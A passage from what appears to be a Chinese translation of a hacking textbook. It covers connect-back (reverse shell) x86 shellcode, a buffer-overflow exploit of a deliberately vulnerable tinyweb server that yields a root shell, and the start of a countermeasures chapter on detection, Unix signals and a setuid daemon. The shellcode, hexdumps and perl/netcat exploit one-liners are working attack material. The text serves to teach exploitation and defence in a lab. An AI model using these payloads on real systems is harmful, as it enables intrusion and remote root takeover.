然而，防火墙通常不会过滤出站连接，因为这会阻碍可用性。从防火墙内部，用户应该能够访问任何网页或建立任何其他出站连接。这意味着如果 shellcode 发起出站连接，大多数防火墙都会允许它。

连接回 shellcode 不是等待攻击者的连接，而是发起一个 TCP 连接回攻击者的 IP 地址。打开 TCP 连接只需要调用socket()和调用connect()。这与绑定端口 shellcode 非常相似，因为 socket 调用完全相同，connect()调用接受与bind()相同的类型参数。以下连接回 shellcode 是从绑定端口 shellcode 经过一些修改（以粗体显示）得到的。

连接回 Shellcode

connectback_shell.s

BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    ; socketcall is syscall #102 (0x66).
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.

  xchg esi, eax     ; Save socket FD in esi for later.

; connect(s, [2, 31337, <IP address>], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 (needed for AF_INET)
  `push DWORD 0x482aa8c0 ; Build sockaddr struct: IP address = 192.168.42.72`
  push WORD 0x697a  ;   (in reverse order)    PORT = 31337
  push WORD bx      ;                         AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  `inc ebx           ; ebx = 3 = SYS_CONNECT = connect()`
  int 0x80          ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})
  xchg eax, ebx     ; Put socket FD in ebx and 0x00000003 in eax.
  push BYTE 0x2     ; ecx starts at 2.
  pop ecx
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  dec ecx           ; Count down to 0.
  jns dup_loop      ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve  syscall #11.
  push edx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push edx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

在上面的 shellcode 中，连接 IP 地址设置为 192.168.42.72，这应该是攻击机的 IP 地址。这个地址以0x482aa8c0的形式存储在in_addr结构中，这是 72、42、168 和 192 的十六进制表示。当每个数字以十六进制形式显示时，这一点很清楚：

reader@hacking:~/booksrc $ gdb -q
(gdb) p /x 192
$1 = 0xc0
(gdb) p /x 168
$2 = 0xa8
(gdb) p /x 42
$3 = 0x2a
(gdb) p /x 72
$4 = 0x48
(gdb) p /x 31337
$5 = 0x7a69
(gdb)

由于这些值以网络字节序存储，但x86 架构是小端序，所以存储的 DWORD 看起来是反转的。这意味着 192.168.42.72 的 DWORD 是0x482aa8c0。这也适用于用于目标端口的两个字节的 WORD。当使用 gdb 以十六进制形式打印端口号 31337 时，字节序显示为小端序。这意味着显示的字节必须反转，所以 31337 的 WORD 是0x697a。

netcat 程序也可以使用-l命令行选项来监听入站连接。在下面的输出中，它用于监听端口 31337 的连接回 shellcode。ifconfig命令确保 eth0 的 IP 地址是 192.168.42.72，这样 shellcode 就可以连接回它。

reader@hacking:~/booksrc $ sudo ifconfig eth0 192.168.42.72 up
reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:01:6C:EB:1D:50
          inet addr:192.168.42.72  Bcast:192.168.42.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:16

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...

现在，让我们尝试使用 connectback shellcode 来利用 tinyweb 服务器程序。从之前与这个程序的工作中，我们知道请求缓冲区长度为 500 字节，位于栈内存的0xbffff5c0位置。我们还知道返回地址位于缓冲区末尾 40 字节内。

reader@hacking:~/booksrc $ nasm connectback_shell.s
reader@hacking:~/booksrc $ hexdump -C connectback_shell
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 68 c0 a8  2a 48 66 68 7a 69 66 53  |.jfXCh..*HfhzifS|
00000020  89 e1 6a 10 51 56 89 e1  43 cd 80 87 f3 87 ce 49  |..j.QV..C......I|
00000030  b0 3f cd 80 49 79 f9 b0  0b 52 68 2f 2f 73 68 68  |.?..Iy...Rh//shh|
00000040  2f 62 69 6e 89 e3 52 89  e2 53 89 e1 cd 80        |/bin..R..S....|
0000004e
reader@hacking:~/booksrc $ wc -c connectback_shell
78 connectback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))
402
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$1 = 0xbffff688
reader@hacking:~/booksrc $

由于缓冲区起始到返回地址的偏移量为 540 字节，因此必须写入总共 544 字节来覆盖四个字节的返回地址。由于返回地址使用多个字节，返回地址覆盖还需要正确对齐。为了确保正确对齐，NOP sled 和 shellcode 字节的和必须能被四整除。此外，shellcode 本身必须保持在覆盖的第一 500 字节内。这些是响应缓冲区的界限，之后的内存对应于在改变程序控制流之前可能写入栈上的其他值。保持在这些界限内可以避免随机覆盖 shellcode 的风险，这不可避免地会导致崩溃。重复返回地址 16 次将生成 64 字节，可以将这些字节放在 544 字节 exploit 缓冲区的末尾，并确保 shellcode 安全地位于缓冲区界限内。exploit 缓冲区开头的剩余字节将是 NOP sled。上述计算表明，402 字节的 NOP sled 可以正确对齐 78 字节的 shellcode，并将其安全地放置在缓冲区界限内。重复所需的返回地址 12 次将完美地间隔 exploit 缓冲区的最后 4 字节，以覆盖栈上保存的返回地址。用0xbffff688覆盖返回地址应该将执行返回到 NOP sled 的中间，同时避免接近缓冲区开始的字节，这些字节可能会被破坏。上述计算出的值将在以下 exploit 中使用，但首先 connect-back shell 需要一些地方来连接回。以下输出中，netcat 用于监听端口 31337 的传入连接。

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...

现在，在另一个终端中，可以使用计算出的 exploit 值远程利用 tinyweb 程序。

在另一个终端窗口中

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x402';
> cat connectback_shell;
> perl -e 'print "\x88\xf6\xff\xbf"x20 . "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open

在原始终端中，shellcode 已经连接回监听端口 31337 的 netcat 进程。这提供了远程 root shell 访问。

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...
connect to [192.168.42.72] from hacking.local [192.168.42.72] 34391
whoami
root

这个示例的网络配置稍微有些令人困惑，因为攻击目标是 127.0.0.1，而 shellcode 连接回 192.168.42.72。这两个 IP 地址都路由到同一个地方，但 192.168.42.72 在 shellcode 中使用起来比 127.0.0.1 更方便。由于回环地址包含两个空字节，地址必须通过多个指令在栈上构建。一种方法是将两个空字节写入栈中，使用一个清零的寄存器。文件 loopback_shell.s 是 connectback_shell.s 的修改版本，它使用 127.0.0.1 的回环地址。以下输出显示了这些差异。

reader@hacking:~/booksrc $ diff connectback_shell.s loopback_shell.s
21c21,22
<   push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72
---
>   push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1
>   mov WORD [esp+1], dx  ; overwrite the BBBB with 0000 in the previous push
reader@hacking:~/booksrc $

在将值0x01BBBB7f推送到栈后，ESP 寄存器将指向这个 DWORD 的开始。通过在 ESP+1 处写入两个空字节（null bytes）的 WORD，中间的两个字节将被覆盖，从而形成正确的返回地址。

这条额外的指令使 shellcode 的大小增加了几个字节，这意味着 NOP sled 也需要调整以适应漏洞缓冲区。这些计算在下面的输出中显示，并导致一个 397 字节的 NOP sled。这个使用 loopback shellcode 的漏洞利用假设 tinyweb 程序正在运行，并且有一个 netcat 进程正在监听端口 31337 上的传入连接。

reader@hacking:~/booksrc $ nasm loopback_shell.s
reader@hacking:~/booksrc $ hexdump -C loopback_shell | grep --color=auto 00
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 68 7f bb  bb 01 66 89 54 24 01 66  |.jfXCh....f.T$.f|
00000020  68 7a 69 66 53 89 e1 6a  10 51 56 89 e1 43 cd 80  |hzifS..j.QV..C..|
00000030  87 f3 87 ce 49 b0 3f cd  80 49 79 f9 b0 0b 52 68  |....I.?..Iy...Rh|
00000040  2f 2f 73 68 68 2f 62 69  6e 89 e3 52 89 e2 53 89  |//shh/bin..R..S.|
00000050  e1 cd 80                                          |...|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print
 "\x88\
xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open

与之前的漏洞利用一样，监听端口 31337 的 netcat 终端将接收 rootshell。

reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42406
whoami
root

这几乎看起来太简单了，不是吗？

第 0x600 章。对策

金色毒箭蛙分泌出极其有毒的毒液——一只青蛙就能分泌出足以杀死 10 名成年人的毒液。这些青蛙之所以拥有如此惊人的防御能力，唯一的原因是某种蛇类一直捕食它们并产生抗性。作为回应，青蛙不断进化出更强有力的毒液作为防御。这种协同进化的一个结果是青蛙对所有其他捕食者都安全。这种类型的协同进化也发生在黑客之间。他们的攻击技术已经存在多年，因此防御对策的发展是自然而然的事情。作为回应，黑客找到了绕过和颠覆这些防御的方法，然后又创造了新的防御技术。

这种创新循环实际上是非常有益的。尽管病毒和蠕虫会给企业带来相当大的麻烦和昂贵的中断，但它们迫使人们做出反应，从而解决问题。蠕虫通过利用有缺陷软件中现有的漏洞进行复制。通常这些缺陷多年都未被发现，但相对温和的蠕虫如 CodeRed 或 Sasser 迫使这些问题得到修复。就像水痘一样，最好是早期就出现轻微的爆发，而不是多年后造成真正的损害。如果不是互联网蠕虫将这些安全漏洞公之于众，它们可能仍然未被修补，使我们容易受到那些除了复制之外还有更恶意目标的人的攻击。这样，蠕虫和病毒实际上可以在长期内加强安全性。然而，还有更多积极主动的方式来加强安全性。防御对策存在，试图消除攻击的影响，或者防止攻击发生。对策是一个相当抽象的概念；这可能是一个安全产品、一系列政策、一个程序，或者只是一个警觉的系统管理员。这些防御对策可以分为两组：那些试图检测攻击的，和那些试图保护漏洞的。

检测对策

第一组对策试图检测入侵并做出某种响应。检测过程可能包括管理员阅读日志，或者程序嗅探网络。响应可能包括自动终止连接或进程，或者只是管理员仔细检查机器控制台上的所有内容。

作为系统管理员，你所知道的漏洞并不像你所不知道的那么危险。入侵检测得越早，处理得越早，就越有可能被控制。几个月都没有被发现入侵的情况可能会引起担忧。

检测入侵的方法是预测攻击者将要做什么。如果你知道了，那么你就知道该寻找什么。检测对策可以在日志文件、网络数据包或程序内存中寻找这些攻击模式。一旦检测到入侵，黑客就可以从系统中清除，任何文件系统损坏都可以通过恢复备份来撤销，并且可以识别并修补被利用的漏洞。在具有备份和恢复功能的电子世界中，检测对策非常强大。

对于攻击者来说，这意味着检测可以抵消他所做的一切。由于检测可能不会总是立即发生，有一些“打砸抢”场景并不重要；然而，即使在这种情况下，最好不要留下痕迹。隐蔽性是黑客最宝贵的资产之一。利用一个有漏洞的程序来获取 root shell 意味着你可以在该系统上做任何你想做的事情，但避免检测还意味着没有人知道你在那里。这种“上帝模式”和隐形性的结合使得黑客变得危险。从隐蔽的位置，可以从网络中悄悄地嗅探密码和数据，可以对程序进行后门攻击，并可以对其他主机发起进一步的攻击。为了保持隐蔽，你需要简单地预测可能会使用的检测方法。如果你知道他们在寻找什么，你可以避免某些利用模式或模仿有效的模式。隐藏和检测之间的协同进化周期是由思考对方没有考虑过的事情推动的。

系统守护进程

为了进行关于利用对策和绕过方法的现实讨论，我们首先需要一个现实的利用目标。一个远程目标将是一个接受传入连接的服务器程序。在 Unix 中，这些程序通常是系统守护进程。守护进程是一种在后台运行的程序，并以某种方式从控制终端分离。术语 daemon 首次由 20 世纪 60 年代的麻省理工学院黑客提出。它指的是一位名叫詹姆斯·麦克斯韦的物理学家在 1867 年的一个思想实验中提到的分子排序恶魔。在这个思想实验中，麦克斯韦的恶魔是一个具有超自然能力，能够轻松完成困难任务的生物，似乎违反了热力学第二定律。同样，在 Linux 中，系统守护进程不知疲倦地执行提供 SSH 服务和记录系统日志等任务。守护程序通常以 d 结尾，以表示它们是守护进程，例如 sshd 或 syslogd。

通过添加一些内容，《A Tinyweb Server》中的 tinyweb.c 代码可以被改造成一个更真实的系统守护进程。这个新的代码使用了对 daemon() 函数的调用，这将启动一个新的后台进程。这个函数在 Linux 中被许多系统守护进程使用，其 man 页面如下所示。

DAEMON(3)                  Linux Programmer's Manual                 DAEMON(3)

NAME

       daemon - run in the background

SYNOPSIS
       #include <unistd.h>

       int daemon(int nochdir, int noclose);

DESCRIPTION
       The daemon() function is for programs wishing to detach themselves from
       the controlling terminal and run in the background as system daemons.

       Unless the argument nochdir is non-zero, daemon() changes the current
       working directory to the root ("/").

       Unless the argument noclose is non-zero, daemon() will redirect stan
       dard input, standard output and standard error to /dev/null.

RETURN VALUE
       (This function forks, and if the   fork()  succeeds,  the  parent  does
       _exit(0),  so that further errors are seen by the child only.)  On suc
       cess zero will be returned.  If an error occurs,  daemon()  returns  -1
       and  sets  the global variable errno to any of the errors specified for
       the library functions fork(2) and setsid(2).

系统守护进程在控制终端之外运行，因此新的 tinyweb 守护进程代码会写入日志文件。没有控制终端，系统守护进程通常通过信号来控制。新的 tinyweb 守护进程程序需要捕获终止信号，以便在它被杀死时干净地退出。

信号速成课程

信号为 Unix 系统中进程间通信提供了一种方法。当一个进程收到一个信号时，其执行流程会被操作系统中断以调用信号处理程序。信号通过一个数字来识别，每个信号都有一个默认的信号处理程序。例如，当在程序的控制终端中输入 CTRL-C 时，会发送一个中断信号，它有一个默认的信号处理程序，用于退出程序。这允许程序在陷入无限循环时也能被中断。

使用 signal() 函数可以注册自定义信号处理程序。在下面的示例代码中，为某些信号注册了几个信号处理程序，而主代码包含一个无限循环。

signal_example.c

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
/* Some labeled signal defines from signal.h
 * #define SIGHUP        1  Hangup
 * #define SIGINT        2  Interrupt  (Ctrl-C)
 * #define SIGQUIT       3  Quit (Ctrl-\)
 * #define SIGILL        4  Illegal instruction
 * #define SIGTRAP       5  Trace/breakpoint trap
 * #define SIGABRT       6  Process aborted
 * #define SIGBUS        7  Bus error
 * #define SIGFPE        8  Floating point error
 * #define SIGKILL       9  Kill
 * #define SIGUSR1      10  User defined signal 1
 * #define SIGSEGV      11  Segmentation fault
 * #define SIGUSR2      12  User defined signal 2
 * #define SIGPIPE      13  Write to pipe with no one reading
 * #define SIGALRM      14  Countdown alarm set by alarm()
 * #define SIGTERM      15  Termination (sent by kill command)
 * #define SIGCHLD      17  Child process signal
 * #define SIGCONT      18  Continue if stopped
 * #define SIGSTOP      19  Stop (pause execution)
 * #define SIGTSTP      20  Terminal stop [suspend] (Ctrl-Z)
 * #define SIGTTIN      21  Background process trying to read stdin
 * #define SIGTTOU      22  Background process trying to read stdout
 */

/* A signal handler */
void signal_handler(int signal) {
   printf("Caught signal %d\t", signal);
   if (signal == SIGTSTP)
      printf("SIGTSTP (Ctrl-Z)");
   else if (signal == SIGQUIT)
      printf("SIGQUIT (Ctrl-\\)");
   else if (signal == SIGUSR1)
      printf("SIGUSR1");
   else if (signal == SIGUSR2)
      printf("SIGUSR2");
   printf("\n");
}

void sigint_handler(int x) {
   printf("Caught a Ctrl-C (SIGINT) in a separate handler\nExiting.\n");
   exit(0);
}

int main() {
   /* Registering signal handlers */
   signal(SIGQUIT, signal_handler); // Set signal_handler() as the
   signal(SIGTSTP, signal_handler); // signal handler for these
   signal(SIGUSR1, signal_handler); // signals.
   signal(SIGUSR2, signal_handler);

   signal(SIGINT, sigint_handler); // Set sigint_handler() for SIGINT.

   while(1) {} // Loop forever.
}

当这个程序编译并执行时，会注册信号处理程序，程序进入一个无限循环。尽管程序陷入了循环，但传入的信号会中断执行并调用已注册的信号处理程序。在下面的输出中，使用了可以从控制终端触发的信号。signal_handler() 函数完成后，将执行权返回到中断的循环中，而 sigint_handler() 函数则退出程序。

reader@hacking:~/booksrc $ gcc -o signal_example signal_example.c
reader@hacking:~/booksrc $ ./signal_example
Caught signal 20        SIGTSTP (Ctrl-Z)
Caught signal 3 SIGQUIT (Ctrl-\)
Caught a Ctrl-C (SIGINT) in a separate handler
Exiting.
reader@hacking:~/booksrc $

可以使用 kill 命令向一个进程发送特定的信号。默认情况下，kill 命令向进程发送终止信号（SIGTERM）。使用 -l 命令行选项，kill 会列出所有可能的信号。在下面的输出中，SIGUSR1 和 SIGUSR2 信号被发送到另一个终端中正在执行的 signal_example 程序。

reader@hacking:~/booksrc $ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL
 5) SIGTRAP      6) SIGABRT      7) SIGBUS       8) SIGFPE
 9) SIG KILL     10) SIGUSR1     11) SIGSEGV     12) SIGUSR2
13) SIGPIPE     14) SIGALRM     15) SIGTERM     16) SIGSTKFLT
17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU
25) SIGXFSZ     26) SIGVTALRM   27) SIGPROF     28) SIGWINCH
29) SIGIO       30) SIGPWR      31) SIGSYS      34) SIGRTMIN
35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3  38) SIGRTMIN+4
39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12
47) SIGRTMIN+13 48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14
51) SIGRTMAX-13 52) SIGRTMAX-12 53) SIGRTMAX-11 54) SIGRTMAX-10
55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7  58) SIGRTMAX-6
59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX
reader@hacking:~/booksrc $ ps a | grep signal_example
24491 pts/3    R+     0:17 ./signal_example
24512 pts/1    S+     0:00  grep signal_example
reader@hacking:~/booksrc $  kill -10 24491
reader@hacking:~/booksrc $  kill -12 24491
reader@hacking:~/booksrc $  kill -9 24491
reader@hacking:~/booksrc $

最后，使用 kill -9 发送 SIGKILL 信号。这个信号的处理器不能被更改，因此 kill -9 总是可以用来杀死进程。在另一个终端中，运行的 signal_example 显示了捕获到的信号，并且进程被杀死。

reader@hacking:~/booksrc $ ./signal_example
Caught signal 10        SIGUSR1
Caught signal 12        SIGUSR2
Killed
reader@hacking:~/booksrc $

信号本身相当简单；然而，进程间通信可以迅速变成一个复杂的依赖网络。幸运的是，在新的 tinyweb 守护进程中，信号仅用于干净的终止，因此实现简单。

Tinyweb 守护进程

这个 tinyweb 程序的新版本是一个在后台运行的系统守护进程，没有控制终端。它将输出写入带有时间戳的日志文件，并监听终止信号（SIGTERM），以便在它被杀死时干净地关闭。

这些新增内容相当微小，但它们提供了一个更加现实的攻击目标。下面的代码列表中，新代码部分以粗体显示。

tinywebd.c

#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
`#include <time.h> #include <signal.h>`
#include "hacking.h"
#include "hacking-network.h"

#define PORT 80   // The port users will be connecting to
#define WEBROOT "./webroot" // The webserver's root directory
`#define LOGFILE "/var/log/tinywebd.log" // Log filename  int logfd, sockfd;  // Global log and socket file descriptors void handle_connection(int, struct sockaddr_in *, int);`
int get_file_size(int); // Returns the file size of open file descriptor
`void timestamp(int); // Writes a timestamp to the open file descriptor  // This function is called when the process is killed. void handle_shutdown(int signal) {    timestamp(logfd);    write(logfd, "Shutting down.\n", 16);    close(logfd);    close(sockfd);    exit(0); }`

int main(void) {
   int new_sockfd, yes=1;
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;

   `logfd = open(LOGFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);    if(logfd == -1)       fatal("opening log file");`

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
      fatal("setting socket option SO_REUSEADDR");

   `printf("Starting tiny web daemon.\n");    if(daemon(1, 0) == -1) // Fork to a background daemon process.       fatal("forking to daemon process");     signal(SIGTERM, handle_shutdown);    // Call handle_shutdown when killed.    signal(SIGINT, handle_shutdown);    // Call handle_shutdown when interrupted.     timestamp(logfd);    write(logfd, "Starting up.\n", 15);`
   host_addr.sin_family = AF_INET;      // Host byte order
   host_addr.sin_port = htons(PORT);    // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1)
      fatal("binding to socket");

   if (listen(sockfd, 20) == -1)
      fatal("listening on socket");

   while(1) { // Accept loop.
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");

      `handle_connection(new_sockfd, &client_addr, logfd);`
   }
   return 0;
}

`/* This function handles the connection on the passed socket from the  *.passed client address and logs to the passed FD. The connection is  *.processed as a web request and this function replies over the connected  *.socket. Finally, the passed socket is closed at the end of the function.  */ void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {`
   unsigned char *ptr, request[500], resource[500], `log_buffer[500]`;
   int fd, length;

   length = recv_line(sockfd, request);

   `sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);`

   ptr = strstr(request, " HTTP/"); // Search for valid-looking request.
   if(ptr == NULL) { // Then this isn't valid HTTP
      strcat(log_buffer, " NOT HTTP!\n");
   } else {
      *ptr = 0; // Terminate the buffer at the end of the URL.
      ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).
      if(strncmp(request, "GET ", 4) == 0)  // Get request
         ptr = request+4; // ptr is the URL.
      if(strncmp(request, "HEAD ", 5) == 0) // Head request
         ptr = request+5; // ptr is the URL.
      if(ptr == NULL) { // Then this is not a recognized request
         strcat(log_buffer, " UNKNOWN REQUEST!\n");
      } else { // Valid request, with ptr pointing to the resource name
         if (ptr[strlen(ptr) - 1] == '/')  // For resources ending with '/',
             strcat(ptr, "index.html");    // add 'index.html' to the end.
         strcpy(resource, WEBROOT);     // Begin resource with web root path
         strcat(resource, ptr);         //  and join it with resource path.
         fd = open(resource, O_RDONLY, 0); // Try to open the file.
         if(fd == -1) { // If file is not found
            `strcat(log_buffer, " 404 Not Found\n");`
            send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
            send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
         } else {      // Otherwise, serve up the file.
            `strcat(log_buffer, " 200 OK\n");`
            send_string(sockfd, "HTTP/1.0 200 OK\r\n");
            send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
            if(ptr == request + 4) { // Then this is a GET request
               if( (length = get_file_size(fd)) == -1)
                  fatal("getting resource file size");
               if( (ptr = (unsigned char *) malloc(length)) == NULL)
                  fatal("allocating memory for reading resource");
               read(fd, ptr, length);  // Read the file into memory.
               send(sockfd, ptr, length, 0);  // Send it to socket.
               free(ptr); // Free file memory.
         }
         close(fd); // Close the file.
         } // End if block for file found/not found.
      } // End if block for valid request.
   } // End if block for valid HTTP.
   `timestamp(logfd);    length = strlen(log_buffer);    write(logfd, log_buffer, length); // Write to the log.`

   shutdown(sockfd, SHUT_RDWR); // Close the socket gracefully.
}

/* This function accepts an open file descriptor and returns
 * the size of the associated file. Returns -1 on failure.
 */
int get_file_size(int fd) {
   struct stat stat_struct;

   if(fstat(fd, &stat_struct) == -1)
      return -1;
   return (int) stat_struct.st_size;
}
`/* This function writes a timestamp string to the open file descriptor  *.passed to it.  */ void timestamp(fd) {    time_t now;    struct tm *time_struct;    int length;    char time_buffer[40];     time(&now);  // Get number of seconds since epoch.    time_struct = localtime((const time_t *)&now); // Convert to tm struct.    length = strftime(time_buffer, 40, "%m/%d/%Y %H:%M:%S> ", time_struct);    write(fd, time_buffer, length); // Write timestamp string to log. }`

此守护进程程序在后台进行分支，写入带有时间戳的日志文件，并在被杀死时干净地退出。日志文件描述符和连接接收套接字被声明为全局变量，以便可以通过handle_shutdown()函数干净地关闭。此函数被设置为终止和中断信号的回调处理程序，这使得程序在用kill命令杀死时可以优雅地退出。

下面的输出显示了程序编译、执行和杀死的过程。请注意，日志文件包含时间戳，以及当程序捕获终止信号并调用handle_shutdown()以优雅退出时的关闭消息。

reader@hacking:~/booksrc $ gcc -o tinywebd tinywebd.c
reader@hacking:~/booksrc $ sudo chown root ./tinywebd
reader@hacking:~/booksrc $ sudo chmod u+s ./tinywebd
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.

reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25058 ?        Ss     0:00 ./tinywebd
25075 pts/3    R+     0:00 grep tinywebd
reader@hacking:~/booksrc $ kill 25058
reader@hacking:~/booksrc $ ps ax | grep tinywebd
25121 pts/3    R+     0:00 grep tinywebd
reader@hacking:~/booksrc $ cat /var/log/tinywebd.log
cat: /var/log/tinywebd.log: Permission denied
reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd.log
07/22/2007 17:55:45> Starting up.
07/22/2007 17:57:00> From 127.0.0.1:38127 "HEAD / HTTP/1.0"     200 OK
07/22/2007 17:57:21> Shutting down.
reader@hacking:~/booksrc $

这个 tinywebd 程序就像原始的 tinyweb 程序一样提供 HTTP 内容，但它作为一个系统守护进程运行，从控制终端分离出来，并写入日志文件。这两个程序都容易受到相同的溢出漏洞攻击；然而，利用只是开始。使用新的 tinyweb 守护进程作为更现实的漏洞目标，你将学习如何在入侵后避免检测。

行业工具

在设置了一个现实的目标后，让我们回到攻击者的那一侧。对于这种攻击，漏洞脚本是行业中的必备工具。就像专业人士手中的锁匠工具一样，漏洞为黑客打开了多扇门。通过仔细操作内部机制，可以完全绕过安全措施。

在前面的章节中，我们用 C 语言编写了漏洞利用代码，并从命令行手动利用漏洞。漏洞程序和漏洞工具之间的细微差别在于最终化和可重新配置性。漏洞程序更像是枪支而不是工具。就像枪支一样，漏洞程序具有单一的功能，用户界面简单到只需拉动扳机。枪支和漏洞程序都是最终产品，可以被不熟练的人使用，并产生危险的结果。相比之下，漏洞工具通常不是最终产品，也不打算供他人使用。有了编程的理解，黑客开始编写自己的脚本和工具来辅助漏洞利用是顺理成章的。这些个性化的工具自动化繁琐的任务，并促进实验。像传统工具一样，它们可以用于许多目的，扩展用户的能力。

tinywebd 漏洞利用工具

对于 tinyweb 守护进程，我们希望有一个漏洞利用工具，允许我们实验漏洞。就像我们之前漏洞的开发一样，首先使用 GDB 来确定漏洞的细节，例如偏移量。返回地址的偏移量将与原始 tinyweb.c 程序中的相同，但守护进程程序带来了额外的挑战。守护进程调用会派生子进程，在子进程中运行程序的其余部分，而父进程退出。在下面的输出中，在 daemon() 调用后设置了断点，但调试器从未命中它。

reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q ./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 47
42
43         if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
44            fatal("setting socket option SO_REUSEADDR");
45
46         printf("Starting tiny web daemon.\n");
47         if(daemon(1, 1) == -1) // Fork to a background daemon process.
48            fatal("forking to daemon process");
49
50         signal(SIGTERM, handle_shutdown);   // Call handle_shutdown when killed.
51         signal(SIGINT, handle_shutdown);   // Call handle_shutdown when interrupted.
(gdb) break 50
Breakpoint 1 at 0x8048e84: file tinywebd.c, line 50.
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon.

Program exited normally.
(gdb)

